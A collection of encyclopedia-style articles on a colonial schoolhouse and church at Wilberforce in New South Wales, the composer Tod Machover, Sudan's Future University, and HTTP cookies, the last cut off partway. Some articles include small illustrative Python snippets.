It was erected to meet his desire to promote education and religion at the core of the towns he laid out on the Hawkesbury. His scheme of establishing a school, church and burial ground on an elevated and/or central position was fully realised at Wilberforce during his governorship. He chose the sites of the town, church and burial ground personally. His creation of these towns in 1810 was an important expression of the developmental philosophy of settlement coupled with deliberate social engineering to control convict society and to implant a moral economy into their lifestyles. The establishment of the Schoolhouse demonstrated the importance Governor Macquarie attached to educating the children of the emancipated convicts of the Hawkesbury who constituted the rising generation of colonial freeborn. Not only did he establish the policy regarding the towns and their schools-cum-chapels but he personally visited the sites to select the best positions. By laying out the village, selecting the site of the square, church and cemetery, plus promoting the construction of the schoolhouse-cum-chapel, Governor Lachlan Macquarie left his personal signature on the village of Wilberforce. Of all the church/school/cemetery centres established in the towns, this is the one which is most intact, with the schoolhouse surviving from his governorship in conjunction with the cemetery in a commanding position above the town.
The Schoolhouse is also significant as the location of the annual muster from 1823.
The church of St John was completed in 1859 to the design of architect Edmund T Blacket who was a church architect of considerable significance since his Gothic style churches largely created the ecclesiastical style of building so strongly associated with the Victorian era in NSW.
Wilberforce Schoolhouse and St John's are also associated with John Wenban, a noted early schoolteacher who taught at the school for many years and who donated the unusual sundial which graces the exterior of St John's Church.
The place is important in demonstrating aesthetic characteristics and/or a high degree of creative or technical achievement in New South Wales.
The Macquarie schoolhouse is of high aesthetic significance as a surviving and reasonably intact substantial Old Colonial Georgian building. Changes to the building have not altered its original form and symmetry. Deliberately sited near one of the highest points in the town to ensure the prominence of the church in the burgeoning community, with the adjacent church it remains a focal point in the townscape.
St John's Anglican Church is a fine example of a simple rural church in the Victorian Gothic style by the esteemed nineteenth-century architect Edmund Blacket. Blacket designed over 100 churches, of which over 30 were small churches often in rural locations for small congregations. Designed in 1847 and erected between 1857 and 1859, St John's Church at Wilberforce is intact in its form and setting and a fine example of Blacket's early, small rural churches.
The church has a rare example of a vertical sundial in Australia, the work of the former schoolmaster, John Wenban.
The place has a strong or special association with a particular community or cultural group in New South Wales for social, cultural or spiritual reasons.
It meets this criterion of State significance because the Macquarie schoolhouse was the focus for education in Wilberforce until the 1870s whilst the schoolhouse and its successor St John's Church in association with its cemetery have been the core of religious activity in Wilberforce until the present day providing an unbroken chain of use and association for the community stretching back for nearly 200 years. The present church community at Wilberforce is a strong one, with worshippers drawn from beyond the Hawkesbury and is larger than the size of the village would suggest. A number of services are held each Sunday. The Blacket church is used for a traditional service in the morning for those who prefer that form of worship.
The commanding position of the site, with the schoolhouse and St John's Church, plus the associated burial ground, have provided a strong and visible focus for community identity.
The Hawkesbury was an important focus for early settlement from the 1790s. As the community grew, younger sons and the adventurous set out to settle newer lands, a process that continued throughout the nineteenth century. Since Wilberforce was one of the hearthlands of early Australia from which numerous families and individuals ventured forth to settle new lands and establish new communities elsewhere, it possesses a strong attraction for a broad spectrum of people who live beyond the district and draws them back to visit and refresh their family associations with Wilberforce. Church and cemetery are invariably a goal for many such visitors.
The place has potential to yield information that will contribute to an understanding of the cultural or natural history of New South Wales.
As the sole surviving example of a Macquarie town, with the original church/schoolhouse and cemetery still at the core of the village design as laid out by Macquarie, it meets this criterion of State significance. Only at Wilberforce is there tangible physical evidence of the manner in which Macquarie implemented his policy of social engineering through town planning with the civilising elements of education and religion at the core. A combined school and church at the centre of town or in a high position, coupled with a cemetery where all people were directed to inter their dead continually exposed former convicts to these influences with greater or lesser impact. The loss of key elements of the same combinations in the other towns he established means that only at Wilberforce can the full physical, sensory and aesthetic impact of this scheme be experienced.
As a site with early buildings, most notably the original temporary schoolhouse/chapel one of the earliest known buildings in Wilberforce which pre-dates the current 1819 Macquarie schoolhouse/chapel, the site has archaeological potential.
The place possesses uncommon, rare or endangered aspects of the cultural or natural history of New South Wales.
It meets this criterion of State significance because Governor Lachlan Macquarie's scheme of establishing a school, church and burial ground on an elevated and/or central position was fully realised at Wilberforce during his governorship. Of the four towns he established where Macquarie laid out a schoolhouse/chapel – Castlereagh, Pitt Town, Wilberforce and Richmond – only the Wilberforce example survives. The loss of elements of similar groups in other Macquarie towns or the loss of the inter-connectedness of their parts means that the Macquarie Schoolhouse and St John's Church are arguably the purest expressions today of what Lachlan Macquarie sought to establish as key anchor points in his townscapes and in his programme of civilising convict society and ameliorating its less moral elements. His creation of these towns was an important expression of the developmental philosophy of settlement coupled with deliberate social engineering to control convict society and to implant a moral economy into their lifestyles. Of all the church/school/burial ground combinations established in the towns, Wilberforce is the one which is most intact, with the schoolhouse surviving from his governorship in conjunction with the cemetery in a commanding position above the town. The church of St John completed in 1859 to the design of architect Edmund T Blacket added an additional element which secured the continued use of this site for its original purpose. The elements of schoolhouse, church and cemetery are inter-dependent. Views between the different elements reinforce the power of religion and education and the hope that they would reinforce each other in re-making a new more moral society. Views into and out of the site intensified that objective. The school and church looked down from a commanding position. One had to look upwards to view the church and school.
The place is important in demonstrating the principal characteristics of a class of cultural or natural places/environments in New South Wales.
It meets this criterion of State significance because the Wilberforce Macquarie Schoolhouse and burial ground with its later addition of the Blacket church are the epitome of what Lachlan Macquarie wished to implement as demonstrable elements of power, education and religion. The loss of elements of similar groups in the other Macquarie towns or the loss of the inter-connectedness of their parts means that the Macquarie Schoolhouse and St John's are arguably the purest expressions today of what Lachlan Macquarie sought to establish as key anchor points in his townscapes and in his programme of civilising convict society and ameliorating its less moral elements.
St John's Anglican Church is a good representative example of a Victorian Gothic church. Features typical of the style include the steeply pitched roof, high-quality stonework, belfry, chancel and narrow pointed arched windows. The simplicity of the church is characteristic of Edmund Blacket's designs for rural churches, and it is a fine and largely intact example of his rural work.
Edmund Thomas Blacket designed over 100 churches, of which over 30 were small churches often in rural locations for small congregations. St John's Church of England at Wilberforce was one of his small rural churches, designed in 1847 and erected between 1857 and 1859. Comparable small churches include St Mark's, Picton (1850–7), St John the Evangelist, Hartley (1857–9), St James, Pitt Town (1857–9) and Holy Trinity, Berrima (1849–). A small later church built for a modest rural community is All Saints, Condobolin (1878–9). Though there is no definite evidence that he designed it, circumstantial evidence points to Blacket as the designer. Many other churches designed by E T Blacket were for large towns such as Wellington and Goulburn or for Sydney or its suburbs, which were of a different order and scale to his smaller rural churches.
St John's Anglican Church is a fine example of a simple rural church in the Victorian Gothic style by the esteemed nineteenth-century architect Edmund Blacket. Blacket designed over 100 churches, of which over 30 were small churches often in rural locations for small congregations. Designed in 1847 and erected between 1857 and 1859, St John's Church at Wilberforce is intact in its form and setting and a fine example of Blacket's early, small rural churches.
See also
Australian non-residential architectural styles
List of Anglican churches in the Diocese of Sydney
References
Bibliography
Australian Dictionary of Biography.
Attribution
External links
Wilberforce
Wilberforce, New South Wales
Houses in New South Wales
Wilberforce
Defunct schools in New South Wales
Articles incorporating text from the New South Wales State Heritage Register
John, Wilberforce
1859 establishments in Australia
Churches completed in 1859
Victorian architecture in New South Wales
Gothic Revival architecture in New South Wales
Gothic Revival church buildings in Australia
|
5255479
|
https://en.wikipedia.org/wiki/Tod%20Machover
|
Tod Machover
|
Tod Machover (born November 24, 1953 in Mount Vernon, New York) is a composer and an innovator in the application of technology in music. He is the son of Wilma Machover, a pianist, and Carl Machover, a computer scientist.
He was named Director of Musical Research at IRCAM in 1980. Joining the faculty at the new Media Laboratory of the Massachusetts Institute of Technology (MIT) in 1985, he became Professor of Music and Media and Director of the Experimental Media Facility. Currently Professor of Music and Media at the MIT Media Lab, he is head of the Lab's Hyperinstruments/Opera of the Future group and has been Co-Director of the Things That Think (TTT) and Toys of Tomorrow (TOT) consortia since 1995. In 2006, he was named Visiting Professor of Composition at the Royal Academy of Music in London. He has composed significant works for Yo-Yo Ma, Joshua Bell, Matt Haimovitz, the Ying Quartet, the Boston Pops, the Los Angeles Philharmonic, Penn & Teller, and many others, as well as designed and implemented various interactive systems for performance by Peter Gabriel and Prince. Machover gave a keynote lecture at NIME-02, the second international conference on New Interfaces for Musical Expression, which was held in 2002 at the former Media Lab Europe in Dublin, Ireland, and is a frequent lecturer worldwide. Machover was a finalist for the 2012 Pulitzer Prize in Music for his opera "Death and the Powers".
Education
He attended the University of California at Santa Cruz in 1971 and received a BM and MM from the Juilliard School in New York where he studied with Elliott Carter and Roger Sessions (1973–1978). He also started his Doctoral studies at Juilliard before being invited as Composer-in-Residence to Pierre Boulez's new Institut de Recherche et Coordination Acoustique/Musique (IRCAM) in 1978.
History
In the fall of 1978, Tod Machover arrived at IRCAM in Paris and was introduced to Giuseppe di Giugno's digital synthesizer 4 series. Light was premiered at the Metz Festival in November 1979 using the 4C, which grew out of di Giugno's conviction that "synthesizers should be made for musicians, not for the people that make them" (Electric Sound, p. 181). In 1981 he composed Fusione Fugace for solo performance on a real-time digital synthesizer called the 4X machine. At IRCAM in 1986 and 1987 he was motivated to score for a keyboard and percussion duet, with an emphasis on extending their performance into many complex sound layers. He composed Valis, again using di Giugno's 4X system to process voices. This desire to enhance human performance foreshadowed his concept of the hyperinstrument (a term he coined in 1986). At MIT's Media Lab, he developed methods for taking many more sophisticated measurements of the instrument as well as of the performer's expression. He focused on augmenting keyboard instruments, percussion, strings and even the act of conducting, with the goal of developing and implementing new technology to expand the capabilities of musical instruments and their performers. He propelled forward-thinking research in the field of musical performance and interaction using new musical and technological resources. Originally concentrated on the enhancement of virtuosic performance, this research expanded toward building sophisticated interactive musical instruments for non-professional musicians, children, and the general public. He premiered the Brain Opera in 1996, an interactive music experience with hyperinstruments that aimed to turn every human being into a musician.
Hyperinstruments
Hyperviolin
Essentially an electric violin, the hyperviolin produces audio output that provides raw material for real-time timbre analysis and synthesis techniques. Coupled with an enhanced bow (see Hyperbow), measured properties of both the instrument's audio output and the player's bowing gesture create data which controls aspects of the resulting amplified sound.
Hypercello
In addition to bow pressure and string contact, wrist sensors and left-hand fingering-position indicators provide measurements which are evaluated and processed in response to the performance.
Hyperbow
Bowing parameters (speed, force, position) are measured and the data is processed to create an interaction between performance properties and audio output. Different types or styles of bowing drive complex calculations which lend themselves to the performance and manipulation of larger structures and compositional shapes.
Hyperpiano
MIDI data generated by the performer on a Yamaha Disklavier is manipulated by various Max/MSP processes to accompany and augment the keyboard performance.
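The descriptions above can be summarised, very loosely, as mapping continuous sensor measurements onto synthesis control parameters. The following Python sketch is purely illustrative and is not Machover's actual software; the parameter names and scaling are invented for the example.

# Purely illustrative sketch (not Machover's actual software): map hypothetical
# sensor readings from an augmented instrument onto synthesis control parameters.

def map_gesture_to_controls(bow_speed, bow_force, bow_position):
    """Scale raw gesture measurements (assumed normalised to 0.0-1.0)
    into parameters a synthesis engine might consume."""
    return {
        "amplitude": min(1.0, bow_force * 1.2),   # more force, louder output
        "brightness": bow_speed,                  # faster bowing, brighter timbre
        "reverb_mix": 1.0 - bow_position,         # more reverb toward the fingerboard
    }

if __name__ == "__main__":
    print(map_gesture_to_controls(bow_speed=0.7, bow_force=0.4, bow_position=0.9))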
Stage works
Valis: an opera in two parts (1987), based on Philip K. Dick's novel VALIS
Brain Opera (1996), an original, interactive musical experience that included contributions from both on-line participants and live audiences. It toured Europe, Asia, the United States and South America from 1996 to 1998 and was permanently installed at Vienna's House of Music in the spring of 2000.
Resurrection (1999 at Houston Grand Opera with Joyce DiDonato) (based on Leo Tolstoy's last novel)
Skellig (2008), an opera based on the novel of the same name by David Almond
Death and the Powers (2010), an opera with live electronics and robotics developed by the M.I.T. Media Lab. Libretto by Robert Pinsky
Schoenberg in Hollywood (2018), an opera with film and live electronics commissioned by the Boston Lyric Opera. Libretto by Simon Robson
Compositions
Ye Gentle Birds (1979) for soprano, mezzo-soprano and wind ensemble
Fresh Spring (1977) for baritone solo and large chamber ensemble
With Dadaji in Paradise (1977-'78, rev. 1983) for solo cello
Two Songs (1978) for soprano and chamber ensemble
Concerto for Amplified Guitar (1978) for amplified acoustic guitar and large chamber ensemble
Deplacements (1979) for amplified guitar and computer-generated tape
Light (1979) for chamber orchestra and computer electronics
Soft Morning, City! for soprano, double bass, and computer-generated tape
Winter Variations (1981) for large chamber ensemble
String Quartet No. 1 (1981)
Fusione Fugace (1981-'82) for keyboard, two specialized interfaces, and live 4X digital synthesizer
Chansons d'Amour (1982) for solo piano
Electric Etudes (1983) for amplified cello, live and pre-recorded computer electronics
Spectres Parisiens (1983-'84) for flute, horn, cello, chamber orchestra and computer electronics
Hidden Sparks (1984) for solo violin
Famine (1985) for four amplified voices and computer-generated sounds
Desires (1985-'89) for symphony orchestra
Nature's Breath (1988-'89) for chamber orchestra
Towards the Center (1988-'89) for amplified flute, clarinet, violin, cello, electronic keyboard and percussion, with five hyperinstrument electronics
Flora (1989) for pre-recorded soprano and computer-generated sound
Bug Mudra (1989-'90) for two guitars (electric and amplified-acoustic), electronic percussion, conducting dataglove, and interactive computer electronics
Begin Again Again … (1991) for Yo-Yo Ma and hypercello (part of the Hyperstring Trilogy)
"Song of Penance" (1992) for hyperviola and chamber orchestra (part of the Hyperstring Trilogy)
"Forever and Ever" (1993) for hyperviolin and orchestra (part of the Hyperstring Trilogy)
Hyperstring Trilogy (1991-'93, rev. 1996-'97) for hypercello, hyperviola, hyperviolin and chamber orchestra
Bounce (1992) for hyperkeyboards, Yamaha Disklavier Grand piano and interactive computer electronics
He's Our Dad (1997) for soprano, keyboard and computer-generated sound
Meteor Music (1998) interactive installation Meteorite Museum
"Sparkler" (2001) for orchestra and interactive computer electronics Sparkler
"Toy Symphony" (2002/3) for hyperviolin Children's Chorus, Music Toys, and Orchestra Toy Symphony
"Mixed Messiah" (2004), a 6-minute remix of Handel's Messiah Mixed Messiah
"I Dreamt A Dream" (2004) for youth chorus, piano and electronics
"Sea Soaring" (2005) for flute, electronics, and live audience interaction Music Garden
...but not simpler... (2005)
Jeux Deux (2005) for hyperpiano and orchestra
Another Life (2006) for nine instruments and electronics
"VinylCello" (2007) for amplified cello, DJ and live computer electronics
"Spheres and Splinters" (2010) for hypercello, spatialized audio reproduction, and visuals Spheres and Splinters
"Open up the House" (2013) for soprano and piano National Opera Center America
A Toronto Symphony: Concerto for Composer and City (2013) for orchestra and electronics, composed with the citizens of Toronto
Festival City (2013) for orchestra and electronics composed with the public for the Edinburgh International Festival
Between the Desert and the Deep Blue Sea: A Symphony for Perth (2014) for orchestra and electronics composed with the public for the Perth International Arts Festival
Breathless (2014) for flute, orchestra and electronics Bemidji Symphony Orchestra
Time and Space (2015) for orchestra, inspired by the essays of Michel de Montaigne
A Symphony for Our Times (2015) for live piano and recorded orchestra and electronics, for the closing performance of the World Economic Forum Annual Meeting in 2015
Restructures (2015) for two pianos and electronics, tribute to Pierre Boulez premiered at the 2015 Lucerne Festival
Eine Sinfonie für Luzern (2015) for orchestra and electronics, created with the public for the 2015 Lucerne Festival
Fensadense (2015) for ten musicians and hyperinstruments with live electronics, premiered at the 2015 Lucerne Festival
"Symphony in D" (2015) for orchestra, voice, additional performers and electronics, premiered by the Detroit Symphony
"Philadelphia Voices" (2018) for four choirs, to be premiered by Westminster Choir College's Symphonic Choir at the Kimmel Center and Carnegie Hall.
Journal articles
Awards
Chevalier de l'Ordre des Arts et des Lettres, France (1995)
DigiGlobe Prize in Interactive Media, Germany (1998)
Telluride Tech Festival Award of Technology and the Ray Kurzweil Award of Technology in Music, USA (2003)
Charles Steinmetz Prize from IEEE and Union College, USA (2007)
Pulitzer Prize in Music Finalist for "Death and the Powers" (2012)
Kennedy Center for the Performing Arts Award for Arts Advocacy (2013)
2016 Composer of the Year, Musical America
References
External links
Web page
Faculty profile
Research & Projects
Opera of the Future Blog
NewMusicBox
Shaping Minds Musically
Music-Making for All
CNN Video Documentary 1/07
"My Cello" by Tod Machover in Sherry Turkle's book, Evocative Objects: Things We Think With, MIT Press 2007.
Tod Machover Playlist Appearance on WMBR's Dinnertime Sampler radio show April 16, 2003
"Inventing instruments that unlock new music" (TED2008)
Toy Story: An MIT Project Helps Musical Novices Express Themselves article in Andante (online magazine), September 5, 2002 (archived 2007)
1953 births
20th-century classical composers
21st-century American composers
21st-century classical composers
Academics of the Royal Academy of Music
American classical composers
American male classical composers
American opera composers
Living people
Male opera composers
MIT Media Lab people
20th-century American composers
20th-century American male musicians
21st-century American male musicians
|
28979857
|
https://en.wikipedia.org/wiki/The%20Future%20University%20%28Sudan%29
|
The Future University (Sudan)
|
The Future University (FU), or simply Future University, formerly known as Computer Man College (CMC), is the first specialized information and communications technology university in Sudan. From its establishment in 1991 as Computer Man College, it was considered the first college to introduce an Information Technology program in the region, and within the country it was the first to introduce a Computer Engineering program and the second to introduce the Telecommunication Engineering and Architecture & Design programs. It was upgraded to a university in August 2010 by the Sudan Ministry of Higher Education and Scientific Research. The university adopts the credit hours system in its education process, making it one of the first educational institutes to implement this system in Sudan. It is the first private academic institution in Sudan hosting a UNESCO chair. Currently, the university contains seven faculties, each offering several programs (some running and others proposed).
History
About the founder
Dr. Abubaker Mustafa Mohammed Khair, the founder and chairman of the Board of Trustees of The Future University, received a B.Sc. in Electrical Engineering, Computer Engineering Communication (University of Belgrade, 1970), an M.Sc. in Computer Technology, Computer System (American University), Applied Science in Engineering (George Washington University, 1975), and a Ph.D. in Management of Information Systems (George Washington University).
First years
The foundation of the college coincided with the huge surge in the field of information technology that the world was witnessing. Its effects were reflected in the administrative and economic structures of Sudan and other countries; new concepts were created, such as globalization, knowledge societies, e-commerce and e-government.
During this era, the college embarked on strategic plans to offer three programs: Information Technology, Computer Engineering and Computer Science, and then to introduce the Telecommunication Engineering and Architecture & Design programs. CMC occupies buildings that are almost 20 years old; The Future University's new campus is being constructed.
From CMC to FU
Upgrading Computer Man College into the new Future University has been requested from the Sudan Ministry of Higher Education and Scientific Research three times, beginning 15 years ago.
It was eventually approved in 2010. On the morning after the approval, many students reported that they were surprised when they arrived at the college and saw a new sign at the front of the buildings reading "Future University" instead of the old "Computer Man College". On that day, a camel and a number of sheep were sacrificed (i.e. slaughtered) on the campus, and their meat was given away as charity (Karāma) to the poor and others, as an act of thanksgiving for the college's upgrade.
Faculties
Faculty of Information Technology, offering 10-semester B.Sc. degree programs in Information Technology, Knowledge Management, Knowledge Engineering, Digital Marketing and Digital Banking, and a six-semester Diploma program in Information Technology
Faculty of Computer Science, with B.Sc. degree programs in Computer Science, Artificial Intelligence and Bio-Informatics, and a Diploma program in Telecommunication Engineering
Faculty of Telecommunication and Space Technology, with B.Sc. degree programs in Telecommunication Engineering and Satellite Engineering
Faculty of Engineering, with B.Sc. degree programs in Computer Engineering, Electronics Engineering, Bio-Medical Engineering, Laser Engineering and Mechatronics Engineering, and Diploma programs in Computer Engineering, Electronics Engineering and Network Engineering
Faculty of Architecture, with a B.Sc. degree program in Architecture & Design
Faculty of Geo-Informatics, with B.Sc. degree programs in Geo-Informatics and Remote Sensing
Faculty of Arts and Design, offering B.Sc. degree programs in Interior Design, Graphic Design and Creative Multimedia
There are also Diploma programs in E-Commerce Technology, Commerce & Accounting Information Technology and Internet Design Technology, and a one-semester certificate program for Additional & Continuing Education and the International Computer Driving License
Centers of Excellence
Space Technology Center
FU Alumni
UNESCO/Cousteau Ecotechnie Chair
Centre for E-Learning and Software Development (CESD)
Affiliations with international universities
Multimedia University, Malaysia
UNITAR University, Malaysia
Limkokwing University, Malaysia
Nettuno University, Italy
International Centre for Theoretical Physics (ICTP), Italy
Linkoping University, Sweden
University of Brasilia, Brazil
University of Rio Grande, Brazil
University of São Paulo, Brazil
Norwegian University of Science and Technology, Norway
University of Tromsø, Norway
Oslo University, Norway
Tennessee University, USA
Boston University, USA
California Institute of Technology, USA
The logo
The current logo of The Future University was the winning logo in a contest the university held among its students and staff.
The new buildings
The university has recently started building its new campus, located next to the current buildings. It is planned to contain modern lecture rooms, labs, an auditorium and libraries, and to accommodate about 18,000 students. In 2006, the college procured the land for the new campus, an area of 20,000 square meters. The cost of constructing, equipping and furnishing the new campus is approximately US$60 million. Construction has been paused several times for unclear reasons; the chairman of the board stated in an interview that he believed the new buildings would be fully constructed and ready for use by the end of 2011, but as of early 2017 the campus had still not been completed and remained in the foundation phase.
See also
List of universities in Sudan
List of universities in Africa
Education in Sudan
Sudanese Universities Information Network
Association of Sudanese Universities
References
External links
Universities and colleges in Sudan
Education in Khartoum
Educational institutions established in 1991
Science and technology in Sudan
Scientific organisations based in Sudan
1991 establishments in Sudan
|
5068415
|
https://en.wikipedia.org/wiki/HTTP%20cookie
|
HTTP cookie
|
HTTP cookies (also called web cookies, Internet cookies, browser cookies, or simply cookies) are small blocks of data created by a web server while a user is browsing a website and placed on the user's computer or other device by the user's web browser. Cookies are placed on the device used to access a website, and more than one cookie may be placed on a user's device during a session.
Cookies serve useful and sometimes essential functions on the web. They enable web servers to store stateful information (such as items added in the shopping cart in an online store) on the user's device or to track the user's browsing activity (including clicking particular buttons, logging in, or recording which pages were visited in the past). They can also be used to save for subsequent use information that the user previously entered into form fields, such as names, addresses, passwords, and payment card numbers.
Authentication cookies are commonly used by web servers to authenticate that a user is logged in, and with which account they are logged in. Without the cookie, users would need to authenticate themselves by logging in on each page containing sensitive information that they wish to access. The security of an authentication cookie generally depends on the security of the issuing website and the user's web browser, and on whether the cookie data is encrypted. Security vulnerabilities may allow a cookie's data to be read by an attacker, used to gain access to user data, or used to gain access (with the user's credentials) to the website to which the cookie belongs (see cross-site scripting and cross-site request forgery for examples).
Tracking cookies, and especially third-party tracking cookies, are commonly used as ways to compile long-term records of individuals' browsing histories, a potential privacy concern that prompted European and U.S. lawmakers to take action in 2011. European law requires that all websites targeting European Union member states gain "informed consent" from users before storing non-essential cookies on their device.
Background
Origin of the name
The term "cookie" was coined by web-browser programmer Lou Montulli. It was derived from the term "magic cookie", which is a packet of data a program receives and sends back unchanged, used by Unix programmers. The term magic cookie itself derives from the fortune cookie, which is a cookie with an embedded message.
History
Magic cookies were already used in computing when computer programmer Lou Montulli had the idea of using them in web communications in June 1994. At the time, he was an employee of Netscape Communications, which was developing an e-commerce application for MCI. Vint Cerf and John Klensin represented MCI in technical discussions with Netscape Communications. MCI did not want its servers to have to retain partial transaction states, which led them to ask Netscape to find a way to store that state in each user's computer instead. Cookies provided a solution to the problem of reliably implementing a virtual shopping cart.
Together with John Giannandrea, Montulli wrote the initial Netscape cookie specification the same year. Version 0.9beta of Mosaic Netscape, released on October 13, 1994, supported cookies. The first use of cookies (outside the labs) was checking whether visitors to the Netscape website had already visited the site. Montulli applied for a patent for the cookie technology in 1995, and it was granted in 1998. Support for cookies was integrated with Internet Explorer in version 2, released in October 1995.
The introduction of cookies was not widely known to the public at the time. In particular, cookies were accepted by default, and users were not notified of their presence. The public learned about cookies after the Financial Times published an article about them on February 12, 1996. In the same year, cookies received a lot of media attention, especially because of potential privacy implications. Cookies were discussed in two U.S. Federal Trade Commission hearings in 1996 and 1997.
The development of the formal cookie specifications was already ongoing. In particular, the first discussions about a formal specification started in April 1995 on the www-talk mailing list. A special working group within the Internet Engineering Task Force (IETF) was formed. Two alternative proposals for introducing state in HTTP transactions had been put forward by Brian Behlendorf and David Kristol respectively. But the group, headed by Kristol himself and Lou Montulli, soon decided to use the Netscape specification as a starting point. In February 1996, the working group identified third-party cookies as a considerable privacy threat. The specification produced by the group was eventually published as RFC 2109 in February 1997. It specified that third-party cookies either were not allowed at all, or at least were not enabled by default.
At this time, advertising companies were already using third-party cookies. The recommendation about third-party cookies of RFC 2109 was not followed by Netscape and Internet Explorer. RFC 2109 was superseded by RFC 2965 in October 2000.
RFC 2965 added a Set-Cookie2 header field, which informally came to be called "RFC 2965-style cookies" as opposed to the original Set-Cookie header field which was called "Netscape-style cookies". Set-Cookie2 was seldom used, however, and was deprecated in RFC 6265 in April 2011 which was written as a definitive specification for cookies as used in the real world. No modern browser recognizes the Set-Cookie2 header field.
Terminology
Session cookie
A session cookie (also known as an in-memory cookie, transient cookie or non-persistent cookie) exists only in temporary memory while the user navigates a website.
Session cookies expire or are deleted when the user closes the web browser. Session cookies are identified by the browser by the absence of an expiration date assigned to them.
Persistent cookie
A persistent cookie expires at a specific date or after a specific length of time. For the persistent cookie's lifespan set by its creator, its information will be transmitted to the server every time the user visits the website that it belongs to, or every time the user views a resource belonging to that website from another website (such as an advertisement).
For this reason, persistent cookies are sometimes referred to as tracking cookies because they can be used by advertisers to record information about a user's web browsing habits over an extended period of time. However, they are also used for "legitimate" reasons (such as keeping users logged into their accounts on websites, to avoid re-entering login credentials at every visit).
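For illustration only, the following Python sketch (using the standard library's http.cookies module, with hypothetical cookie names and values) shows how the distinction appears in a Set-Cookie header: a cookie emitted without Expires or Max-Age is a session cookie, while one given a Max-Age becomes persistent.

# Session versus persistent cookies with Python's standard http.cookies module.
from http.cookies import SimpleCookie

cookies = SimpleCookie()
cookies["theme"] = "light"                       # session cookie: no expiry attribute
cookies["sessionToken"] = "abc123"               # persistent cookie: expires in 7 days
cookies["sessionToken"]["max-age"] = 7 * 24 * 3600

print(cookies.output())   # emits one "Set-Cookie: ..." line per cookie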
Secure cookie
A secure cookie can only be transmitted over an encrypted connection (i.e. HTTPS). It cannot be transmitted over unencrypted connections (i.e. HTTP). This makes the cookie less likely to be exposed to cookie theft via eavesdropping. A cookie is made secure by adding the Secure flag to the cookie.
Http-only cookie
An http-only cookie cannot be accessed by client-side APIs, such as JavaScript. This restriction eliminates the threat of cookie theft via cross-site scripting (XSS). However, the cookie remains vulnerable to cross-site tracing (XST) and cross-site request forgery (CSRF) attacks. A cookie is given this characteristic by adding the HttpOnly flag to the cookie.
Same-site cookie
In 2016 Google Chrome version 51 introduced a new kind of cookie with the attribute SameSite. The attribute SameSite can have a value of Strict, Lax or None. With the attribute SameSite=Strict, browsers would only send cookies to a target domain that is the same as the origin domain. This would effectively mitigate cross-site request forgery (CSRF) attacks. With SameSite=Lax, browsers would send cookies with requests to a target domain even if it is different from the origin domain, but only for safe requests such as GET (POST is unsafe) and not as third-party cookies (inside an iframe). The attribute SameSite=None would allow third-party (cross-site) cookies; however, most browsers require the Secure attribute on SameSite=None cookies.
The Same-site cookie is incorporated into a new RFC draft for "Cookies: HTTP State Management Mechanism" to update RFC 6265 (if approved).
Chrome, Firefox and Microsoft Edge have all started to support same-site cookies. The key issue in the rollout is the treatment of existing cookies that have no SameSite attribute defined; Chrome has been treating such cookies as if they were SameSite=None, which keeps all websites and applications running as before. Google intended to change that default to SameSite=Lax in February 2020; the change would break applications and websites that rely on third-party/cross-site cookies but do not define the SameSite attribute. Given the extensive changes required of web developers and the COVID-19 circumstances, Google temporarily rolled back the SameSite cookie change.
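As a rough illustration (assuming Python 3.8 or later, where the standard http.cookies module accepts a samesite attribute; the cookie names are hypothetical), the three policies described above can be emitted as follows:

# SameSite policies expressed as Set-Cookie headers (Python 3.8+).
from http.cookies import SimpleCookie

c = SimpleCookie()
c["csrf"] = "token123"
c["csrf"]["samesite"] = "Strict"     # sent only with same-site requests

c["session"] = "abc123"
c["session"]["samesite"] = "Lax"     # also sent on safe top-level cross-site navigations

c["ad_id"] = "xyz789"
c["ad_id"]["samesite"] = "None"      # cross-site use allowed, but most browsers
c["ad_id"]["secure"] = True          # then require the Secure attribute as well

print(c.output())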
Third-party cookie
Normally, a cookie's domain attribute will match the domain that is shown in the web browser's address bar. This is called a first-party cookie. A third-party cookie, however, belongs to a domain different from the one shown in the address bar. This sort of cookie typically appears when web pages feature content from external websites, such as banner advertisements. This opens up the potential for tracking the user's browsing history and is often used by advertisers in an effort to serve relevant advertisements to each user.
As an example, suppose a user visits www.example.org. This website contains an advertisement from ad.foxytracking.com, which, when downloaded, sets a cookie belonging to the advertisement's domain (ad.foxytracking.com). Then, the user visits another website, www.foo.com, which also contains an advertisement from ad.foxytracking.com and sets a cookie belonging to that domain (ad.foxytracking.com). Eventually, both of these cookies will be sent to the advertiser when loading their advertisements or visiting their website. The advertiser can then use these cookies to build up a browsing history of the user across all the websites that have ads from this advertiser, through the use of the HTTP referer header field.
, some websites were setting cookies readable for over 100 third-party domains. On average, a single website was setting 10 cookies, with a maximum number of cookies (first- and third-party) reaching over 800.
Most modern web browsers contain privacy settings that can block third-party cookies, and some now block all third-party cookies by default - as of July 2020, such browsers include Apple Safari, Firefox, and Brave. Safari allows embedded sites to use Storage Access API to request permission to set first-party cookies. In May 2020, Google Chrome introduced new features to block third-party cookies by default in its Incognito mode for private browsing, making blocking optional during normal browsing. The same update also added an option to block first-party cookies. Chrome plans to start blocking third-party cookies by default in 2023.
Supercookie
A supercookie is a cookie with an origin of a top-level domain (such as .com) or a public suffix (such as .co.uk). Ordinary cookies, by contrast, have an origin of a specific domain name, such as example.com.
Supercookies can be a potential security concern and are therefore often blocked by web browsers. If unblocked by the browser, an attacker in control of a malicious website could set a supercookie and potentially disrupt or impersonate legitimate user requests to another website that shares the same top-level domain or public suffix as the malicious website. For example, a supercookie with an origin of .com, could maliciously affect a request made to example.com, even if the cookie did not originate from example.com. This can be used to fake logins or change user information.
The Public Suffix List helps to mitigate the risk that supercookies pose. The Public Suffix List is a cross-vendor initiative that aims to provide an accurate and up-to-date list of domain name suffixes. Older versions of browsers may not have an up-to-date list, and will therefore be vulnerable to supercookies from certain domains.
Other uses
The term "supercookie" is sometimes used for tracking technologies that do not rely on HTTP cookies. Two such "supercookie" mechanisms were found on Microsoft websites in August 2011: cookie syncing that respawned MUID (machine unique identifier) cookies, and ETag cookies. Due to media attention, Microsoft later disabled this code. In a 2021 blog post, Mozilla used the term "supercookie" to refer to the use of browser cache (see below) as a means of tracking users across sites.
Zombie cookie
A zombie cookie is data and code that has been placed by a web server on a visitor's computer or other device in a hidden location outside the visitor's web browser's dedicated cookie storage location, and that automatically recreates an HTTP cookie as a regular cookie after the original cookie has been deleted. The zombie cookie may be stored in multiple locations, such as Flash Local Shared Objects, HTML5 Web storage, and other client-side and even server-side locations, and when the cookie's absence is detected, the cookie is recreated using the data stored in these locations.
Cookie wall
A cookie wall pops up on a website and informs the user of the website's cookie usage. It has no reject option, and the website is not accessible without tracking cookies.
Structure
